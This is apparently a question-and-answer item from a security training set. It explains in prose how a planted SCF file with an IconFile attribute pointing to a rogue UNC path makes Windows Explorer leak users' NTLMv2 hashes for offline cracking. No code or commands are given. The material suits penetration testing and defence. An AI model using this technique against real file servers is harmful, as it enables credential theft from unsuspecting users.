How can an attacker use SCF files on a file server to steal NTLMv2 hashes?

An attacker can place an SCF file (Windows Explorer Command file) with an `IconFile` attribute pointing to a UNC path on a fake file server. When a user opens a folder containing this SCF file, Windows Explorer automatically tries to fetch the icon from the fake server, triggering an SMB authentication attempt. The fake server captures the user's NTLMv2 hash, which can then be cracked offline. This technique is detailed in Penetration Techniques - Using Icon Files to Obtain NTLMv2 Hash from File Server Connections.